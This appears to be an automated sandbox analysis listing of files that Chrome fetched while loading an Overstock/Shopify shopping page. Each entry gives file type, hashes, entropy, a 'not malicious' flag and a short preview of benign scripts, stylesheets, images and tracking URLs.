                                                                                                                                                          Preview:import{bL as P,a as t,n as A,e as B,A as l,bM as E,q as U,y as M,ad as N,bN as O,aa as z,V as G,a7 as J,I as V}from"./app.CRtF78CU.js";const W=P(function(s,r){return t("iframe",{...s,ref:r})}),X={Map:"veGnT"},q="https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/current-location-pin.BapvrdeV.svg",H="https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/destination-location-pin.DwoZMqg_.svg",p="shopify_sandboxed_message:";function K(e){if(!(typeof e!="string"||!e.startsWith(p)))try{return JSON.parse(e.replace(p,""))}catch{}}function Q(e){return`${p}${JSON.stringify(e)}`}function x(e){return e?.map(s=>{switch(s.type){case"current":return{...s,image:q};case"destination":return{...s,image:H};default:return s}})}const j=200;function ke({className:e,markers:s,options:r,title:_,mapId:F,blockSize:u=j,onMarkerSelect:f,handleBoundsChanged:m,handleCenterChanged:h,handleClick:d,handleDoubleClick:g,handleDrag:b,handleZoomChanged:T,handleDragEnd:R}){const I=A(),C=B
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):13
                                                                                                                                                          Entropy (8bit):2.7773627950641693
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                          SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                          SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                          SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://td.doubleclick.net/td/fls/rul/activityi;fledge=1;src=14698185;type=overs0;cat=allsi0;ord=1;num=3350742580016;npa=0;auiddc=1714882903.1729272252;ps=1;pcor=865959874;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=1;gtm=45fe4ah0v9189675736z89176705627za201zb9176705627;gcd=13l3l3l3l1l1;dma=0;tag_exp=101533422~101686685;epver=2;~oref=https%3A%2F%2Fwww.overstock.com%2Fwpm%408688a91bwbd065f36p51297ecfmc385dee2%2Fcustom%2Fweb-pixel-17006751%4079%2Fsandbox%2Fmodern%2F?
                                                                                                                                                          Preview:<html></html>
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):43233
                                                                                                                                                          Entropy (8bit):7.972082007679784
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:D3F009F08B2DFB9D8C8F567B774CD94D
                                                                                                                                                          SHA1:EC51D653E1F0C6DA4048C709F3672FC2F927121A
                                                                                                                                                          SHA-256:309A19BA17D61A82F80F828EA28BD56817842B0B3B273B6615F1EDA595533CF3
                                                                                                                                                          SHA-512:5B9285A15EC906EFCB1E9B72B50545CAEA0E304C5BA5697CD4F2F6C1853398BEEF0630A6670114F52ADDAD6BE6C24021254644030A4B1C6E2BF72DB8F36E2624
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@....................................................................................,<.......x<....5..1y#...x<..1[}?.TYO.C|~....q.d..W...|~}N...OA@.xD..xt<....x<.......m}Q........^W...<..Y/.J.{.?/.l\.I...-....3.w..d
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Java source, Unicode text, UTF-8 text, with very long lines (7432)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):7672
                                                                                                                                                          Entropy (8bit):5.099796305925857
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:143629072C608447B267A639D14251AE
                                                                                                                                                          SHA1:9E302F32276D50C513109941F2DD8F34FA8C250B
                                                                                                                                                          SHA-256:35030287DA9315576E5D641CC346FC1C92E22FFAD316B4665BAB22C20F43352A
                                                                                                                                                          SHA-512:A4956928FEF502C9F463E55C6E7B70FEE2C49A14B4BD705FD6E60A223C41F2238097069C5951A208EDB93AF5A5B6BAB4439087ED7B6E196C416A9DEEF34D78AE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/index.Da9Wf6zy.js
                                                                                                                                                          Preview:const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=["component-Captcha.CUYYIHaX.js","app.CRtF78CU.js","assets/app.BK5OxPpc.css","ShopPayCaptcha.Dvh5gPuw.js","assets/Captcha.BHCCpQV5.css"])))=>i.map(i=>d[i]);.import{e as t,T as n,bI as o,bJ as s,bK as i,_ as d}from"./app.CRtF78CU.js";const _=new Map([["INSUFFICIENT_FUNDS","insufficient_funds"],["INVALID_PAYMENT_METHOD","cannot_verify"],["FUNDING_ERROR","processing_error"],["CANCELED_PAYPAL_BILLING_AGREEMENT","processing_error"],["TOKEN_EXPIRED","processing_error"],["INVALID_TOKEN","processing_error"],["UNILATERAL_AUTH_ERROR","processing_error"],["THIRD_PARTY_INTERNAL_ERROR","processing_error"],["AUTHORIZATION_ERROR","processing_error"],["INVALID_CURRENCY","processing_error"],["INVALID_ITEM_TOTAL","processing_error"],["UNPROCESSABLE_TRANSACTION","processing_error"],["INVOICE_ALREADY_PAID","processing_error"],["INCORRECT_NUMBER","cannot_verify"],["INCORRECT_CVC","cannot_verify"],["INCORRECT_ZIP","cannot_verify"],["INCORRECT_ADDRESS",
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):29581
                                                                                                                                                          Entropy (8bit):7.955221541324057
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:F728CCA72BC6CDDC4FB332EE306F62E1
                                                                                                                                                          SHA1:3303F9F8358949335BDB83ADD3490E7F1C9F2EB1
                                                                                                                                                          SHA-256:B6D29909A18378342460A4A732263D1C201BD3B3E73324A1D3743D37DF6E7152
                                                                                                                                                          SHA-512:D71708BF57A6CBBC88FC60458842B57EA465BB022D92271757D6C1BBE5BD5AAE3B76F519A637FA63DE936C7BFB8344D30EBA1E2E9CBD9E6881E11F1958DC57F8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@...................................................................................]["7.'t..e...p..0..0........G...L....8.(.=...H.....l....4.G..........|..3.....g8a..a..p....u<o.^~..4x.D..V..Y.$w.I...[R+.O....O.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):684
                                                                                                                                                          Entropy (8bit):4.905931501804048
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:FFE5AF2DE8BB6BDB64C654D880C363BF
                                                                                                                                                          SHA1:A6F815956A7728C94CACD8C96030CED48FBBDBDF
                                                                                                                                                          SHA-256:867C793B860A8DBDC24FA5081B1926EE7E57B83A0AE509BFB709D55C86A69709
                                                                                                                                                          SHA-512:557182932715CB06BC20790385BEE87E05F5F2BDE5834FA98D4DB9029D578475B75B9303BC4DDFE490F24CD6197D63CDA3FA1E7BEF54ED14CDA2FDA415B9D649
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://ak1.ostkcdn.com/img/mxc/star-empty.svg
                                                                                                                                                          Preview:<svg width="14" height="14" viewBox="0 0 14 14" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_35_678)">.<path d="M5.43359 4.75456L7 0.936694L8.56641 4.75456C8.66743 5.00078 8.89623 5.18459 9.17653 5.21188L13.1729 5.60093L10.14 8.39753C9.94081 8.58122 9.86015 8.85534 9.91524 9.11191L10.7955 13.2114L7.38559 11.0862C7.14905 10.9388 6.85095 10.9388 6.61441 11.0862L3.20449 13.2114L4.08476 9.11191C4.13985 8.85534 4.05919 8.58122 3.85998 8.39754L0.827052 5.60093L4.82347 5.21188C5.10376 5.18459 5.33257 5.00078 5.43359 4.75456Z" stroke="#2F3337"/>.</g>.<defs>.<clipPath id="clip0_35_678">.<rect width="14" height="14" fill="white"/>.</clipPath>.</defs>.</svg>.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):30478
                                                                                                                                                          Entropy (8bit):7.980482788322824
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:77FAAB1219F5AA1FDA008C520C2FA2BE
                                                                                                                                                          SHA1:6CCE175D2623234653C17EA1039D3EEB5ACBCB96
                                                                                                                                                          SHA-256:BDF8E2601F9C6439A8D7B0D7E5D524531AE38A0042F588C4B17C46DDD8788253
                                                                                                                                                          SHA-512:C1E43D9F2F75A7A3E6DEF6A1E4B4D76ED4DCF08B51A697EB17CA9A6B51B1FE12AA7D0DB53CAFF147DAF095A8E849D361B84DBE9A78B5776B2EB8E228B2322ED4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/SAFAVIEH_2C-Adirondack-Allegonda-Modern-Abstract-Rug.jpg?v=1716363556&width=320
                                                                                                                                                          Preview:RIFF.w..WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 vt...H...*@.@.>9..C.!...f. ........g..M-C...y.u...B...?.../........E..?.{....3|....G._...G.'.....=.?......2.....w._......go....y..?.{............7......7........?._f..}...?5.*...?.K..._.....~u.?.....~......?.........?..\|Q~/.?B?v.w.....g........v....`o...?....5.-....._>.........3.W.......?..z....~......[Xs:...=$sa.v.4.. %C)..h@..].s.~..F5.TduC...*E....>;.A...A.....c5..|..x}.....O.8..t.bf4gnYf...].%d..x.....I.J....-._J...wH.-'b..1...\r.].........^v...c..W.5..._..]...Nd..`.lW.,^.F,.....~.$g...R.....e|J\.Y.~...n...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):78
                                                                                                                                                          Entropy (8bit):4.801445732171809
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:A79547EED1E9652E4E91D8F00BB4E7D7
                                                                                                                                                          SHA1:6B716AF5662B392C077493146DB6416712332FF5
                                                                                                                                                          SHA-256:9F0AD38B29EAE39C7841139C3DD23C4402F69B55FA403D47AFBD1116447D392E
                                                                                                                                                          SHA-512:F86950C72DECF1A1FADBC0E641C119663136A18F4FD937EE551E1D45133A7BCE3FF68657074176D5D0CDF00B317745AB39E7B040B0F666BF3EA0407CDFCE9C71
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/SubscriptionPriceBreakdown.Bqs0s4oM.css
                                                                                                                                                          Preview:.hMn1U{line-height:calc(var(--x-global-typography-line-size-default) * 1.15)}.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):26454
                                                                                                                                                          Entropy (8bit):7.974152845656269
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:D611B8EA2445CB40BE41824F07836D2B
                                                                                                                                                          SHA1:A01ED5634E3DFC4A087C6A2AF47CB00B509EA487
                                                                                                                                                          SHA-256:46B4F0B22625C9B3735D9C71D78BDA93FF01ACB8CD94C5D6E4C640B0981CD2E5
                                                                                                                                                          SHA-512:D43D430938F4BD0244212FA7445290F5555381B0A0796E8B95EF9A1A009F05295DAD68AC767DE780E9D63E1C99357229CFBED6BDCE482D15AA4211A269429A90
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/Intelligent-Design-Adley-Purple-6-Piece-Reversible-Daybed-Set.jpg?v=1717245109&width=320
                                                                                                                                                          Preview:RIFFNg..WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .d..0-...*@.@.>9..C.!..l.. ......w.x....D......|....O....kx7G.w.....].C.?./._....~............./w?..z..m....._y.._..........+.....O...oc....}....w......y...../._.....?t..?.z......B...Q._....C.........E.[.GY...#...o........O......&.U......`...........;........F......_.#.....~.9..........O..o._t.`?.?........g.....{..2...k...............1......>B...e..........r?.....?c?.../....}&?...\F.A.X.......'..2...vO.....`../..b........P..v...[r6...G..q...2.-...n%.D.....Y..X.P./..t...N..C7^W>.s?.z%X..Wz..g......;.........3..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (5864), with CRLF line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):629074
                                                                                                                                                          Entropy (8bit):4.417469718736166
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:D73D85E92A92B7856860F15C8BFB22E3
                                                                                                                                                          SHA1:4CBB14983EABCDAB0F2539CFDBB64C5282137A7A
                                                                                                                                                          SHA-256:886A9D56FBC81EBB2074DDA008EAC3BAE466018612E474B3321B6DCB36331469
                                                                                                                                                          SHA-512:7C8C72753D3C5AD3720823DCD033052F159C9296FA2D81F248C20F66A3D9E88FAC60BC75CDCE90BD8F977D6D06E646C8E925C598A1BBE29AD10D1777DC78E5AA
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/extensions/7176b64e-31ff-49da-8800-c9eec1bee9b0/kite-free-gift-discounts-368/assets/freeGiftLogicv1.js
                                                                                                                                                          Preview:....let DEFAULT_addToCartBtnSelectorsApp7Ext = 'input[name="add"], button[name="add"], form[action*="/cart/add"] .gfg__add-to-cart,form[action*="/cart/add"] button[type="submit"], form[action*="/cart/add"] input[type="submit"], .product-form__buttons, .productView-group, .prd-Benefits, .product__submit__buttons, .t4s-product-form__buttons, .product-form__buy-buttons, .product__description, .v-stack.gap-4, .quantity-selector, .groups-btn';..let DEFAULT_checkoutBtnSelectorsApp7Ext = 'button[name="checkout"], input[name="checkout"], form[action*="/cart"] a[href="/checkout"], a[href="/checkout"], form[action="/cart"] input[type="submit"][name="checkout"], form[action="/cart"] button[type="submit"][name="checkout"], .previewCartInfo, .cart__ctas, .cart__items, .buy-buttons--compact, .drawer__footer, .ajax-cart__buttons, .taxes-discounts, .button-container, cart-drawer .line-item__content-wrapper, .mini-cart__actions, .cart__checkout-wrapper, .cart__footer-message, .js-contents, .cart--foote
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (3595)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3702
                                                                                                                                                          Entropy (8bit):5.09013689067411
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:1CA3E1173894A76BE9DF7919A1273A05
                                                                                                                                                          SHA1:E0E9EE3E2972465913D7DE1447F2F461AA1481C6
                                                                                                                                                          SHA-256:8096726D8F3BF2E3E3E04F0F9377CABC56E166A1C48B3EDB64207DFBC44822F2
                                                                                                                                                          SHA-512:14D1F919988764BA6FEEE0D3DF0579C9222786BC39EE0EF91220C2FECDAFF7BABF08BC1AD394900872BB13DD1AB6BE86FD947B41146CFA1DCEE69CB3E76108DC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/t/211/assets/component-collage.css?v=169087997296993984651729142870
                                                                                                                                                          Preview:.collage{display:grid;grid-column-gap:15px;grid-row-gap:15px}@media (min-width: 750px){.collage-1 .card-overlay{padding-bottom:45%}}@media (min-width: 990px){.collage-1 .card-overlay{padding-bottom:33.3333%}}.collage-2{display:grid;grid-template-columns:repeat(3,minmax(0,1fr))}.collage-2 .card-overlay{grid-column:span 3}@media (min-width: 750px){.collage-2 .card-overlay{grid-column:span 1;width:100%;max-width:100%;height:460px;padding:0}.collage-2 .card-overlay:nth-child(2){grid-column:span 2}}.collage-3{display:grid;grid-template-columns:repeat(2,minmax(0,1fr))}.collage-3 .card-overlay{width:100%;max-width:100%;grid-column:span 2;padding-bottom:100%}@media (min-width: 750px){.collage-3{display:grid;grid-template-columns:repeat(2,minmax(0,1fr))}.collage-3 .card-overlay{width:100%;max-width:100%;grid-column:span 1;height:280px;padding:0}.collage-3 .card-overlay:nth-child(2){order:-1;grid-column:span 2}}@media (min-width: 990px){.collage-3{grid-template-columns:repeat(4,minmax(0,1fr))}.c
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):21862
                                                                                                                                                          Entropy (8bit):7.94084711495925
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:E515E1C73105B4A2CD54448942D89074
                                                                                                                                                          SHA1:2EB7361FF84F9D320C8DF10432C1F83D7EA475C9
                                                                                                                                                          SHA-256:3A8554D5217BFB800B95BFC89A09304BA66E5748070CEB19C9C9CA321C2D3A70
                                                                                                                                                          SHA-512:93D35F3E07D6DB9B45607A509DF0A68FC31D30D79E7E36C63CAE4E3A0B84FB23AA2454AED6DA69CDD7B4A40AFD9148BBA46AB546C7C937B4AEF9CE0E71CBF573
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@...................................................................................2...d....s...@......r....QxRW...2..&U.J...D.xr....w.O.D..V'+F..zO=.R.Rc....G...&X..!.%=....l7..()"g......c4.=+.R.....v[..]nJ.YX.'+
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (44139)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):44228
                                                                                                                                                          Entropy (8bit):5.078062655998568
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:4A44639FE7E0F0FB37A1A1C4286F7D8F
                                                                                                                                                          SHA1:DCF8D17CFF551B75C0A408CF876A4D3D7EAC1A54
                                                                                                                                                          SHA-256:3A023D0D9A93C4A0264E665F6B19C531D968657240B10EDCA517C9EB32E89E66
                                                                                                                                                          SHA-512:2C0EBFC01182519E0B865F493CF7E913888D31FFDCA6611F1FEB21338F989134D72D4C2CFAA23831DE381307BE061E05434D8028B1B39D90E274D32FB4EFEC5E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/t/211/assets/main.js?v=64442423901038758631729142870
                                                                                                                                                          Preview:function focusVisiblePolyfill(){const navKeys=["Tab","ArrowUp","ArrowDown","ArrowLeft","ArrowRight","Enter","Space","Escape","Home","End","PageUp","PageDown"];let currentFocusedElement=null,mouseClick=null;window.addEventListener("keydown",evt=>{navKeys.includes(evt.code)&&(mouseClick=!1)}),window.addEventListener("mousedown",()=>{mouseClick=!0}),window.addEventListener("focus",()=>{currentFocusedElement&&currentFocusedElement.classList.remove("is-focused"),!mouseClick&&(currentFocusedElement=document.activeElement,currentFocusedElement.classList.add("is-focused"))},!0)}try{document.querySelector(":focus-visible")}catch{focusVisiblePolyfill()}(()=>{const{mediaQueries}=theme;if(!mediaQueries)return;const mqKeys=Object.keys(mediaQueries),mqLists={};theme.mediaMatches={};const handleMqChange=()=>{const newMatches=mqKeys.reduce((acc,media)=>(acc[media]=!!(mqLists[media]&&mqLists[media].matches),acc),{});Object.keys(newMatches).forEach(key=>{theme.mediaMatches[key]=newMatches[key]}),window.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):147
                                                                                                                                                          Entropy (8bit):4.6967851000675065
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:F7133FF096C0F9A773E2D950EF012D61
                                                                                                                                                          SHA1:2523775BC391D1F1AEE2E2D5F64D22517ED6FFCD
                                                                                                                                                          SHA-256:21D08090C4CB2F43012E44A5D3FDB05CB167EC4C13178E137227DA3F2F7CC6FA
                                                                                                                                                          SHA-512:34DE7B7C1D428C1C9A5ECC2208B4425A0118FB627624D66E98AD2B3BC1A56D24EADDF7F6BA29AF7A6ADB323E29C346356373BE4E7C925380DEBB2D113698CBE6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://display.powerreviews.com/m/1280018588/l/en_US/product/22730686/snippet?apikey=0ce15d13-67ca-47dd-8c72-1d5e4694ada3&_noconfig=true
                                                                                                                                                          Preview:{"name":"snippet","results":[{"page_id":"22730686","rollup":{"average_rating":4.36,"rating_count":618,"review_count":618,"answered_questions":0}}]}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):29569
                                                                                                                                                          Entropy (8bit):7.960048940036646
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:9A58080132D353F96B76310C2784B3AC
                                                                                                                                                          SHA1:2BFF54C9E53D79D5295B24CFB22043ED454E9449
                                                                                                                                                          SHA-256:C1FF4EFF31E2B1AE68304323E0BEE5D2382F0FA38C7E16C6E3833CC39C72BC7F
                                                                                                                                                          SHA-512:63BCA72F4F86CEB1FBED8C268912359D2CA3C52B7387768588CCFC44E861696334A4D4D70EF11C82A1C343B158E9FE8200EB828D3E6344781F952A6C0255B3C8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@....................................................................................F.e..LZ...&l.#u.D...V...#[.I....P$.u...S...LK.T..Y.<.X.fN..).....H.$D-L.f....QY ...u......DK....C...?......bA..W58..,0.#P...`
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):32034
                                                                                                                                                          Entropy (8bit):7.962872373995671
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:682A0EDDE95588E6CC1D80D1666C7CD1
                                                                                                                                                          SHA1:BE16A93510B9D13530E499B6710493F094243FC6
                                                                                                                                                          SHA-256:3EBA522FF13BE5E32D5CC3BBDFD5DD72A42E4CFDCA652E04A756C00EA1CE6EF5
                                                                                                                                                          SHA-512:6831D4E2E8820952B12362D8EBC4B52BB81B663EE95088589BCD7E10DE5D0201A7C62332E1ACC418A7F5ED32DE94C1E06EB90200F99CBD48C0C096C1E407C10A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@.........................................................................................P....r[..=........v.l6.W.B..........d....9..M5......;..)C.Lo.k..Y_..)U....6....V;...+5g..$.w....*...9..O/....isq.&..\4..9
                                                                                                                                                          No static file info